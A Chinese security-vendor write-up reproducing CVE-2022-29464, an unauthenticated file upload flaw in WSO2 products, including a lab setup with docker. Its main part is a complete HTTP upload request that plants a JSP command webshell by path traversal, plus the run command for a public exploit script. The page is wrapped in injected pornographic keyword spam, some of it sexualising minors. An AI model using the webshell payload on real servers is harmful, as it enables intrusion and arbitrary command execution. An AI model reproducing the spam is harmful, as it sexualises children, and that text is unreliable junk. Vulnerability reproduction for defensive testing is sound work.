东北老妓女叫床脏话对白,小卖部丰满老板嗷嗷叫的故事,东北小伙搡老女人老熟女

  1. <tbody id="zpul8"></tbody>
          1. <button id="zpul8"><acronym id="zpul8"><input id="zpul8"></input></acronym></button>
              安全研究 >> 安全研究詳情

              CVE-2022-29464 WSO2文件上傳漏洞復現

              作者: 發布日期: 01月30日

              01

              漏洞簡介

              CVE-2022-29464  WSO2文件上傳漏洞是Orange Tsai發現的WSO2上的嚴重漏洞。該漏洞允許攻擊者未授權上傳jsp webshell從而在WSO2服務器上執行任意命令。

              02

              漏洞影響版本
              • WSO2 API Manager 2.2.0—4.0.0

              • WSO2 Identity Server 5.2.0—5.11.0

              • WSO2 身份服務器5.4.0、5.4.1、5.5.0 和 5.6.0

              • WSO2 Enterprise Integrator 6.2.0—6.6.0

              • WSO2 身份服務器密鑰管理器 5.3.0—5.10.0

              03

              漏洞環境搭建

              可從vulfocus中拉取docker漏洞鏡像,如圖所示,執行命令

              docker pull vulfocus/wso2-cve_2022_29464

              拉取漏洞鏡像

              漏洞鏡像拉取完成后,如圖所示,執行命令

              docker run -d -it -p 8280:8280 -p 8243:8243 -p 9443:9443 --name cve_2022_29464 vulfocus/wso2-cve_2022_29464

              運行漏洞docker環境

              漏洞環境啟動完成后,訪問

              https://ip:9443

              出現以下頁面代表漏洞環境搭建成功

              04

              漏洞復現

              如圖所示,構造如下數據包即可未授權在目標服務器上寫入cmd webshell

              POST /fileupload/toolsAny HTTP/1.1Host: 192.168.159.130:9443User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeContent-Type: multipart/form-data; boundary=4af6f362a86baadf5ec3177278d4911Cookie: session=0cb2ce62-1f82-4c51-8735-229398731d4f.XC9bRwlYo7x31-PjcBFWrJnuG_w; JSESSIONID=C7832D63E80798858C15459A4267966EUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: cross-siteContent-Length: 805 --4af6f362a86baadf5ec3177278d4911Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/cmd.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/cmd.jsp" <%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd,null,null); BufferedReader sI = new BufferedReader(newInputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s+"</br>"; } } catch(IOException e) {   e.printStackTrace();   } }%> <pre><%=output %></pre>--4af6f362a86baadf5ec3177278d4911--

              訪問

              https://192.168.159.130:9443/authenticationendpoint/cmd.jsp?cmd=whoami

              構造參數cmd和參數值whoami,即可獲得WSO2服務器whoami命令執行結果

              也可通過漏洞EXP

              https://github.com/hakivvi/CVE-2022-29464

              利用漏洞

              如圖所示,將EXP下載后,執行

              python exploit.py https://ip:9443/ shell.jsp

              即可上傳jsp cmdshell至WSO2服務器

              訪問

              https://ip:9443//authenticationendpoint/shell.jsp

              即可通過jsp cmdshell執行任意命令

              05

              漏洞修復

              將存在漏洞的WSO2應用版本升級至安全版本。

              服務熱線:400-811-3777
              Copyright ?2005-2022 杭州美創科技股份有限公司. All Rights Reserved. 浙公網安備 33010502006954號 浙ICP備12021012號-1 網站地圖
              东北老妓女叫床脏话对白,小卖部丰满老板嗷嗷叫的故事,东北小伙搡老女人老熟女 少妇丰满爆乳被呻吟进入,丰满少妇被猛烈进入高清APP,少妇丰满爆乳被呻吟进入图片 末发育女AV片一区二区在线观看,12末发育娇小性色XXXX,暗呦交小U女国产精品视频 国产放荡AV剧情演绎麻豆,国产麻豆剧传媒精品国产AV,麻豆国产尤物AV尤物在线观看 性高朝久久久久久久3小时,午夜精品久久久久久久99蜜桃,性做久久久久久久久不卡 精品久久久久中文字幕日本,一本久久伊人热热精品中文字幕,成人一区二区免费中文字幕视频 精品无码成人网站久久久久久无码,无码人妻精品一区二区三区99不...,亚洲精品无码久久久久APP 中文字幕AV无码一区二区三区,无码AV人妻精品一区二区三区抖...,一本一道AⅤ无码中文字幕 中文字幕AV一区二区三区人妻少妇,亚洲国产精品无码一线岛国,亚洲AV乱码中文一区二区三区 蜜臀精品无码AV在线播放,蜜臀AV 国内精品久久久,蜜臀AV免费一区二区三区